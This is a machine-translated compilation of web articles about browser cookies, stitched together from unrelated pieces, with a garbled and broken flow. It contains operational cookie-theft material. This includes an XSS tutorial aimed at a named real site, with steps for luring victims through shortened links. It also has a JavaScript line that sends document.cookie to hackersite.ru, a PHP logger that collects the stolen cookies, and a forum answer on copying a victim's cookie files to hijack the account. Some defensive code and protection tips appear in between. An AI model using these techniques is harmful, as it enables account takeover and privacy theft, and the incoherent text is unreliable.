My friend forgot the password to one site. However, he had previously checked the "Remember me" box when signing in with the Google Chrome browser, which allowed him to log into the site under his account. I was asked if this magical state can be transferred to another computer. It would be more correct, of course, to change or restore the password, but the acquaintance could not do this for reasons not related to the case.

How to use intercepter-ng for dummies

Despite the variety of choice of modern software, it is difficult to find programs for hacking for android better than intercepter ng. The first criterion pointing in favor of this product is its actual performance. Most of the proposed sniffers on the network are only an imitation that does not perform the declared functions.

The next positive factors are the versatility of the application and the coverage of a wide audience of users.


Let's start in order. Cookies or "cookies" are very small text files - bookmarks with information.

The web server sends this information to the user's browser, where it is stored until required. Not quite clear? Well, OK.

I'll try to make it even easier. Look: you have registered on some site.

At the time of registration, these very "cookies" are created.

Here they are.

Cookie Cadger

The program listens to traffic on the WiFi network, intercepts cookies and replicates the user's session in your browser, repeating requests with his credentials. Author Matthew Sullivan gave a presentation of the program on September 30 at the Derbycon hacker conference. Right during the speech, Matthew Sullivan intercepted an unsecured session with Google of one of the conference attendees via WiFi.

How to steal cookies

If, while on a page of the site, you enter the following text into the address bar of the Firefox or Opera browser: javascript:document.write(document.cookie); you will see something like: remixAdminsBar=0; remixGroupType=0; remixpass=********************; remixwall=0; remixInformation=0; remixMembersBar=0; remix description=0; remixautobookmark=8; remixemail=*******; remixmid=23363; remixchk=5; remixaudios=0; remixlinksBar=1; remixOfficersBar=0; remixPhotosBar=0; remixTopicsBar=0; remixvideos=0; remixRecentNews=0; remixAlbumsBar=0 Attention! .

The Complete Guide to Cross-Site Scripting

XSS is a type of software vulnerability, native to web applications, that allows an attacker to inject client-side script into web pages viewed by other users. Wikipedia has the following definition for XSS: “Cross-site scripting (XSS) is a type of software vulnerability native to Web applications (by circumventing browser security restrictions)” that allows an attacker to inject client-side script into web pages viewed by other users.

Difference between cookies and sessions

Not so long ago I wrote an article on how to register and authorize users on the site.

In this article, I'm going to break down the difference between sessions and cookies so that you can make your final choice.

Cookies. No, it's not about cookies, it's about your safety. Say you go to your favorite site "vkontakte" (or, for example, check your mail) on someone else's computer, refuse the "save password" option, happily look through the mail and leave. And you do not think about the fact that someone can now log in to the social network or mail under your name.

I don't even consider the situation of a program that remembers a password without you knowing it. This is already a deliberate hack, and you will probably suspect that something like this can happen and you will not go to your favorite site on such a computer. But we can talk about simple human curiosity - we were visiting friends, and then once, and they get the opportunity to read your mail. Are you sure that they will refuse such an opportunity? Aren't you afraid that something will come up? In any case, I will put aside moral issues and just talk about how the information is stored on the computer that you can now be allowed into some site without asking for a password.


And the name of this technology is cookies.

And this is where it all started. The HTTP protocol, over which you in fact browse sites (including this one), did not initially provide for maintaining a connection. That is, roughly speaking, you send a request to the site, get a response, it is displayed on the screen, and then the server does not remember anything about you. Of course, this is good when the site is purely informational and should not remember anything about you, but we live in the Web 2.0 age 😉 The natural development of the protocol is POST and GET requests: when you send some data, the server can write it to a database, but this is not enough.

Let's look at a very simple example. Forum. So you registered, and there is a record on the forum that there is such and such a user with such and such a password and some other additional data. But now you go to the forum and log in - enter your password. Somewhere there should be information that you are logged in. On server? Of course not! It is impossible to save information on the server that authorization was made from your computer - it will not be able to distinguish you from someone else (even your IP address does not uniquely identify you)! Thus, information that authorization has occurred must be stored on your computer. That's what cookies are for, that's what they were created for.

A cookie is a small record on your computer that stores information about the site you have visited. Upon authorization, such an entry is created, after which you can walk around the forum and it will recognize you. However, this happens automatically, thanks to the information stored in the cookie, so pretending to be the main administrator of the forum and bypassing the password check will still not work.

Now we can return to where this article began. If you logged in somewhere without even saving your password, then it may happen that an entry has been created on the computer that now allows you to enter this resource under your name without authorization. Such an entry itself will become obsolete after a while, but you can force it to be cleared. Each browser does this differently, I'll show you how to do it in my favorite Google Chrome. Opening the options

Go to the "advanced" tab and find the "show cookies" button

Now, of course, you can delete all cookies, but this can upset the computer owner. Therefore, for example, in the upper field you can enter the name of the site you are interested in

Then only the cookies related to this site can be cleared. You can try mine. Moreover, if you log in to my forum, and then clear your cookies, then the authorization information will be forgotten. Try it!


1. What is XSS
An XSS type vulnerability allows inserting arbitrary javascript code into the body of a page. XSS attack differs from others (eg SQL injection or PHP injection) in that it acts not on the server, but on the client.


With its help, you cannot view database tables, upload a shell, etc. The most common use of XSS is to steal cookies.
A cookie is a small piece of data created by a web server and stored on the user's computer as a file. Typically, cookies are used to store account data, and, most often, they contain an encoded password, login, and session ID (though not always).
XSS are of two types, active and passive.

Passive XSS require the victim to directly participate, for example, follow a link containing javascript code. When using this type of XSS, you cannot do without SI (Social Engineering)

Active XSS do not require any participation from the victim, she just needs to go to the page with XSS. Active XSS can be, for example, in forum posts, chats, in adding news, etc.

2. Searching for XSS
In this section, I will tell you how to find XSS.

2.1 Passive XSS
To find passive XSS, just substitute in the input form if the script worked and the message "xss" appeared, then the vulnerability is present, if the script did not work, you can still try ">, this is probably the most common xss vulnerability. If neither one nor the other script worked, then there is most likely no vulnerability.
Let's look at an example.
http://miss.rambler.ru/srch/?sort=0& … amp;words=
See the "search" form? put in there "> and click "find"
A window with xss flew out, which means xss is present. (Perhaps at the time you read this article, this xss will already be fixed)

2.2 Active XSS
Such XSS can be found, for example, in profile fields, in the title of a news item and in the news text itself (less often) when adding news, and in messages on forums / chats / guestbooks with HTML enabled. Everything is simple here: we enter the script from the previous subsection into the fields, and if the message is displayed on the screen, then the vulnerability is present.
Consider xss in BB tags on the forums.
you can try to stupidly insert javascript code into the tag, like this:
javascript:alert('xss')
Some tags have parameters, for example, the tag has dynsrc and lowsrc parameters, let's try to substitute the code like this:
http://www.site.ru/image.jpg dynsrc=javascript:alert('xss')
If the script worked, xss is

3. Using XSS to steal cookies
Now the most delicious
In order to steal cookies, we need a web sniffer, you can install some kind of sniffer on your hosting, or you can use an online sniffer, which are now full.
To steal cookies through passive XSS, the victim needs to follow a poisonous link. To steal cookies we will use instead another script:
we substitute the script in the link and let the victim follow it, see the sniffer log and rejoice.
Let's look at an example.
Let's take that XSS on the rambler from the previous paragraph.
Paste
">
in the search form, click "find", look at the address bar and see:

http://miss.rambler.ru/srch/?sort=0& … &words =">
We throw this link to the victim and enjoy the cookies.
Seeing such a link, the victim may suspect something, so it is advisable to encode
">
in URL Or use services like http://tinyurl.com/
Let's move on to active XSS, everything is simple here, instead of alert() we insert img = new Image(); img.src = "sniffer image address"+document.cookie;

Now we have cookies. But what to do with them? It's simple, they must be substituted instead of their own. In the Opera browser there is a built-in cookie editor (tools-> advanced-> cookie management), there is a plugin for firefox (I don’t remember the name, use google)
That's all for now, perhaps the article will be supplemented

To the question "How to get COOKIES cokies. Need cookies how to get please tell me!!! 1", asked by the author Vlad eeEEeeeeeeeeee, the best answer is:
What are cookies?
The fact is that in the process of development of www-technologies and the introduction of programming languages on the Internet, a very serious problem arose before the developers of programs - how to save the results of the algorithm execution for each specific user for a long time? By itself, the HTTP protocol does not have the ability to capture the results of software processes. Using sessions is also not a solution to the problem, since their action is terminated immediately after the connection to the server is broken.
The problem was resolved with the introduction of the cookies mechanism (that is, translated from English, "cookies"). Cookies have a remarkable property - they are stored on the user's hard drive and can be stored there for an almost unlimited time.
At their core, cookies are plain text files stored in a special directory used by the browser (usually called Temporary Internet Files), and you can see them by going to that directory (quick access to it for the IE browser is through the menu items Tools -> Internet Options -> Temporary Internet Files -> Settings -> View).
Some cookies can only be stored for one session, they are deleted after the browser is closed. Others, set for a certain period of time, are written to a file. In general, this file is called "cookies.txt" (but there may be several) and is located in the working directory of the browser installed on the computer.
in other words
A cookie is a small piece of textual information that the server sends to the browser. By themselves, cookies cannot do anything, but when a user accesses the server (types its address in the browser line), the server can read the information contained in the cookies and, based on its analysis, perform any actions. For example, in the case of authorized access to something via the web, the login and password are stored in cookies during the session, which allows the user not to enter them again when requesting each password-protected document.
If you are trying to get access through this topic to someone else's password-protected accounts, then you need to find a way remotely (trojan) or by impudently copying to a flash drive, if you have access to the computer where the victim works, copy this cookie.txt file and replace it in your (same) your browser on it. Then you go to the desired site where the account you are interested in, and automatically get access. But keep in mind, if the victim presses the exit from the account (for example, from the mail) at the end of the work, then the session information will be erased in the cookies and you will not get any access.
Mozilla Firefox stores cookies in the user profile, in the file C:\Documents and Settings\Username\Application Data\Mozilla\Firefox\Profiles\<profile name>\cookies.txt
Internet Explorer saves these cookies as separate text files in the folder C:\Documents and Settings\Username\Cookies
Opera stores cookies in the file C:\Documents and Settings\Username\Application Data\Opera\Opera\profile\cookies4.dat

Cookies are information in the form of a text file, stored on the user's computer by the website. They contain authentication data (login/password, ID, phone number, mailbox address), user settings, and access status. They are stored in the browser profile.

Cookie hack is the theft (or "hijacking") of a visitor's session to a web resource. Secret information becomes available not only to the sender and recipient, but also to a third party - the person who intercepted.

Cookie Hacking Tools and Techniques

Computer thieves, like their colleagues in real life, in addition to skills, dexterity and knowledge, of course, have their own tools - a kind of arsenal of master keys and probes. Let's get acquainted with the most popular tricks of hackers, which they use to fish out cookies from the inhabitants of the Internet.

Sniffers

Special programs to monitor and analyze network traffic. Their name comes from the English verb "sniff", because they literally "sniff out" packets transmitted between nodes.

But attackers use a sniffer to intercept session data, messages, and other confidential information. The object of their attacks are mostly insecure networks, where cookies are sent in an open HTTP session, that is, they are practically not encrypted. (Public Wi-Fi is the most vulnerable.)

The following methods are used to inject a sniffer into the Internet channel between the user's host and the web server:

  • "listening" to network interfaces (hubs, switches);
  • branching and copying traffic;
  • connection to the break of the network channel;
  • analysis through special attacks that redirect victim traffic to a sniffer (MAC-spoofing, IP-spoofing).

The abbreviation XSS stands for Cross Site Scripting. It is used to attack websites in order to steal user data.

The way XSS works is as follows:

  • an attacker injects malicious code (a special masked script) onto a web page of a site, forum, or into a message (for example, when chatting on a social network);
  • the victim visits the infected page and activates the planted code on their PC (clicks, follows a link, etc.);
  • in turn, the activated malicious code "extracts" the user's confidential data from the browser (in particular, cookies) and sends them to the attacker's web server.

In order to “implant” a software XSS mechanism, hackers use all sorts of vulnerabilities in web servers, online services and browsers.

All XSS vulnerabilities are divided into two types:

  • Passive. The attack is obtained by querying a specific web page script. Malicious code can be entered in various forms on a web page (for example, in a search bar on a site). The most susceptible to passive XSS are resources that do not filter HTML tags when data arrives;
  • Active. Located directly on the server. And they are activated in the victim's browser. They are actively used by scammers in various blogs, chats and news feeds.
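
What "does not filter HTML tags when data arrives" looks like in a search page, next to the output-encoded form (an added example, not code from the original articles; the function names and the probe string are constructed for the illustration):

```javascript
// Characters that change meaning inside HTML text and quoted attribute values.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// Encode user-supplied text so the browser shows it as text, never as markup.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable form: the search term is concatenated into an attribute value and
// into element content unchanged, so a `">` in the term closes the attribute
// and the tag, and whatever follows is parsed as markup.
function renderSearchVulnerable(words) {
  return '<input name="words" value="' + words + '">' +
         "<p>Results for: " + words + "</p>";
}

// Hardened form: the same template, but every reflected value is encoded first.
function renderSearchEncoded(words) {
  const safe = escapeHtml(words);
  return '<input name="words" value="' + safe + '">' +
         "<p>Results for: " + safe + "</p>";
}

// Count opening tags in a piece of HTML (enough for this fixed template).
function countOpeningTags(html) {
  return (html.match(/<[a-zA-Z][^>]*>/g) || []).length;
}

// Regression check for a render function: a harmless probe containing markup
// must not change the number of tags compared with a plain search term.
const BENIGN_PROBE = '"><i>probe</i>'; // constructed, contains no script

function reflectsRawMarkup(renderFn) {
  const baseline = countOpeningTags(renderFn("cats"));
  const probed = countOpeningTags(renderFn(BENIGN_PROBE));
  return probed !== baseline;
}

console.log("vulnerable template reflects markup:", reflectsRawMarkup(renderSearchVulnerable));
console.log("encoded template reflects markup:   ", reflectsRawMarkup(renderSearchEncoded));
console.log(renderSearchEncoded(BENIGN_PROBE));
```

The same check can run in a test suite against every template that echoes request parameters, so that a template which stops encoding fails the build.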

Hackers carefully "camouflage" their XSS scripts so that the victim does not suspect anything. They change the file extension, pass off the code as an image, motivate the victim to follow the link, and attract them with interesting content. As a result, a PC user who could not resist their own curiosity sends session cookies (with a login and password!) with their own hand (a mouse click) to the author of the XSS script, a computer villain.

Cookie spoofing

All cookies are stored and sent to the web server (from which they "came") without any changes - in their original form - with the same values, strings and other data. Intentional modification of their parameters is called cookie spoofing. In other words, when a cookie is spoofed, the attacker passes off wishful thinking as fact. For example, when making a payment in an online store, the amount of payment in the cookie is changed to a smaller one, so there is a “saving” on purchases.

Stolen session cookies on a social network from someone else's account are “inserted” into another session and on another PC. The owner of the stolen cookies receives full access to the victim's account (correspondence, content, page settings) as long as she is on her page.

"Editing" cookies is carried out using:

  • functions "Manage cookies ..." in the Opera browser;
  • add-ons Cookies Manager and Advanced Cookie Manager for FireFox;
  • IECookiesView utilities (for Internet Explorer only);
  • text editor like AkelPad, NotePad or Windows notepad.

Physical access to data

A very simple scheme to implement, consisting of several steps. But it is effective only if the victim's computer with an open session, for example Vkontakte, is left unattended (and for quite a long time!):

  1. Enter into the address bar of the browser javascript function, which displays all saved cookies.
  2. After pressing "ENTER" they all appear on the page.
  3. Cookies are copied, saved to a file, and then transferred to a flash drive.
  4. On another PC, cookies are replaced in a new session.
  5. Access to the victim's account is opened.

As a rule, hackers use the above tools (+ others) both in combination (since the level of protection on many web resources is quite high) and separately (when users are overly naive).

XSS + sniffer

  1. An XSS script is created, which specifies the address of the online sniffer (of its own production or a specific service).
  2. The malicious code is saved with the .img extension (picture format).
  3. Then this file is uploaded to the site page, chat, or personal message - where the attack will be carried out.
  4. The user's attention is drawn to the created "trap" (here social engineering comes into play).
  5. If the "trap" works, cookies from the victim's browser are intercepted by the sniffer.
  6. The cracker opens the sniffer logs and extracts the stolen cookies.
  7. Then it performs a substitution to obtain the rights of the account owner using the above tools.

Protecting cookies from hacking

  1. Use an encrypted connection (using appropriate protocols and security methods).
  2. Do not respond to dubious links, pictures, tempting offers to get acquainted with the "new free software". Especially from strangers.
  3. Use only trusted web resources.
  4. End an authorized session by pressing the "Logout" button (and not just closing the tab!). Especially if the account was logged into not from a personal computer but, for example, from a PC in an Internet cafe.
  5. Do not use the "Save Password" feature of your browser. Stored registration data increases the risk of theft many times over. Do not be lazy, do not spare a few minutes of time to enter a password and login at the beginning of each session.
  6. After web surfing - visiting social networks, forums, chats, sites - delete saved cookies and clear the browser cache.
  7. Update browsers and antivirus software regularly.
  8. Use browser extensions that protect against XSS attacks (for example, NoScript for FF and Google Chrome).
  9. Periodically in accounts.

And most importantly - do not lose vigilance and attention while relaxing or working on the Internet!

What is a cookie?

There is a mechanism that allows the http server to store some text information on the user's computer and then access it. This information is called a cookie. In fact, each cookie is a pair: the name of the parameter and its value. Each cookie is also assigned the domain to which it belongs. For security purposes, in all browsers, the http server is only allowed to access the cookies of its own domain. Additionally, cookies can have an expiration date, in which case they will be stored on the computer until this date, even if all browser windows are closed.


Why are cookies important?

In all multi-user systems, cookies are used to identify the user. Or rather, the current connection of the user with the service, the user session. If someone learns your cookies, they can log in on your behalf, because at the moment very few Internet resources check for a change of IP address during one user session.
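
A server-side check that follows from this, as an added example that is not part of the original article: the script parses Set-Cookie header lines and reports cookies that a sniffer on an open HTTP connection could see (no Secure), that a script could read through document.cookie (no HttpOnly), that carry no SameSite restriction, or that outlive an assumed 30-day limit. The header lines, the finding names and the limit are constructed for the illustration.

```javascript
const MAX_LIFETIME_S = 30 * 24 * 3600; // assumed policy limit: 30 days

// Split one Set-Cookie header value into name, value and lower-cased attributes.
function parseSetCookie(line) {
  const parts = line.split(";").map((p) => p.trim()).filter(Boolean);
  const first = parts.shift() || "";
  const eq = first.indexOf("=");
  const cookie = {
    name: eq === -1 ? "" : first.slice(0, eq).trim(),
    value: eq === -1 ? first : first.slice(eq + 1).trim(),
    attrs: {},
  };
  for (const p of parts) {
    const i = p.indexOf("=");
    const key = (i === -1 ? p : p.slice(0, i)).trim().toLowerCase();
    cookie.attrs[key] = i === -1 ? true : p.slice(i + 1).trim();
  }
  return cookie;
}

// Return the list of findings for one parsed cookie.
// `now` is a millisecond timestamp, passed in so results are reproducible.
function auditCookie(cookie, now = Date.now()) {
  const a = cookie.attrs;
  const findings = [];
  // Without Secure the cookie also travels over plain HTTP (open Wi-Fi sniffing).
  if (!a.secure) findings.push("NO_SECURE");
  // Without HttpOnly any script on the page can read it via document.cookie.
  if (!a.httponly) findings.push("NO_HTTPONLY");
  // Missing SameSite leaves the behaviour to browser defaults; None sends it cross-site.
  const sameSite = typeof a.samesite === "string" ? a.samesite.toLowerCase() : "";
  if (sameSite !== "lax" && sameSite !== "strict") findings.push("SAMESITE_UNSET_OR_NONE");
  // Max-Age takes precedence over Expires; neither means a session cookie.
  let lifetime = null;
  if (typeof a["max-age"] === "string" && /^-?\d+$/.test(a["max-age"])) {
    lifetime = Number(a["max-age"]);
  } else if (typeof a.expires === "string") {
    const t = Date.parse(a.expires);
    if (!Number.isNaN(t)) lifetime = (t - now) / 1000;
  }
  if (lifetime !== null && lifetime > MAX_LIFETIME_S) findings.push("LONG_LIVED");
  return findings;
}

function auditHeaders(lines, now = Date.now()) {
  return lines.map((line) => {
    const cookie = parseSetCookie(line);
    return { name: cookie.name, findings: auditCookie(cookie, now) };
  });
}

// Constructed sample headers, not taken from any real site.
const SAMPLE_HEADERS = [
  "sid=abc123; path=/; domain=.example.test",
  "sid=abc123; Path=/; Secure; HttpOnly; SameSite=Lax",
  "remember=tok; Max-Age=31536000; Secure; HttpOnly; SameSite=Strict",
  "sid2=x; Expires=Wed, 01 Jan 2031 00:00:00 GMT; HttpOnly",
];
const SAMPLE_NOW = Date.UTC(2030, 0, 1); // fixed clock for the sample run

for (const r of auditHeaders(SAMPLE_HEADERS, SAMPLE_NOW)) {
  console.log(r.name.padEnd(10), r.findings.length ? r.findings.join(", ") : "ok");
}
```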


How to change or change cookies?

Browser developers do not provide built-in tools for editing cookies. But you can get by with a regular notepad (notepad).


Step 1: create a text file with the text

Windows Registry Editor Version 5.00



@="C:\\IE_ext.htm"

We save it under the name IE_ext.reg

Step 2: Using the created file, add changes to the Windows registry.

Step 3: create a text file with text

<script language="javascript">
external.menuArguments.clipboardData.setData("Text" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
alert(external.menuArguments.document.cookie);
</script>

Save it as C:\IE_ext.htm

Step 4: We go to the website of interest to us.

Step 5: Right-click on free space on the page and select the menu item "Working with Cookies". Allow access to the clipboard. Your cookies for this site will be placed on the clipboard. You can paste them into Notepad and take a look.


Step 6: To change a cookie, edit the C:\IE_ext.htm file, replacing testname with the name of the cookie, testvalue with its value, and testdomain.ru with the website domain. Add more lines like this if needed. For the convenience of control, I added the output of the current cookies to the script before and after the change: alert(external.menuArguments.document.cookie);

Step 7: Run Step 5 again and then refresh the page.

Bottom line: we will go to this Internet resource with updated cookies.

How to steal cookies with JavaScript?

If the attacker has found a way to execute an arbitrary JavaScript script on the victim's computer, then he can read the current cookies very easily. Example:


var str = document.cookie;

But will he be able to transfer them to his site? After all, as I pointed out earlier, a JavaScript script cannot access a site located in another domain without additional confirmation. It turns out that a JavaScript script can load any image located on any http server, and at the same time pass any textual information in the request for this picture. Example: http://hackersite.ru/xss.jpg?text_info So if you run this code:

var img = new Image();

img.src = "http://hackersite.ru/xss.jpg?" + encodeURI(document.cookie);


then the cookies will be in the request to download the "picture" and "leave" to the attacker.

How to handle such requests to upload a "picture"?

An attacker only needs to find hosting with php support and place code like this:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Then all query parameters to this script will be saved in the file log.txt. It remains only in the previously described JavaScript script to replace http://hackersite.ru/xss.jpg to the path to this php script.


Outcome

I have shown only the simplest way to exploit XSS vulnerabilities. But it proves that the presence of at least one such vulnerability on a multi-user Internet site can allow an attacker to use its resources on your behalf.

In Opera, open the main menu, go to the "Settings" section and select the line "General settings...". Or you can just press the hotkeys CTRL + F12. This will open the browser settings window, where on the "Advanced" tab you need to click on the "Cookies" section in the left pane. In it, you need to click the "Manage Cookies" button.

In Mozilla Firefox, open the "Tools" section in the menu and select the "Settings" item. In the settings window, you need to go to the "Privacy" tab, find the button there that says "Show Cookies ..." and click it to access the list of cookies stored by the browser. Here they can be searched and viewed.

In Internet Explorer, expand the "Tools" section in the menu and select "Properties". In the property settings window, go to the General tab and click the Options button in the Browsing History section. In this way, you will open another window (“Temporary Files Options”), in which you need to click the “Show Files” button.

Click the "Name" heading in the list of contents of the Internet Explorer temporary files folder that opens - this way you can group all cookies into one block in a common pile of heterogeneous files. Here you can find the file of interest and open it in a standard Notepad for viewing or editing.

In Google Chrome, click the wrench icon in the upper right corner of the window and select Options from the menu. The browser will open the "Settings" page, and you click on the "Advanced" link in its left pane and on the advanced settings page, click on the "Content Settings" button. It's not yet the last page on the way to the cookies stored by this browser.

Click the "All cookies and site data" button on the next page and you will finally have access to the list of cookies.

Google Chrome provides the ability to search, view and delete cookies.

In the Safari browser, click the gear icon in the upper right corner and select the line "Settings ...". In the window for changing settings, you need to go to the "Security" tab in order to click the "Show Cookies" button there. Safari only provides functions for searching and deleting cookies; the contents of these temporary files can only be partially seen here.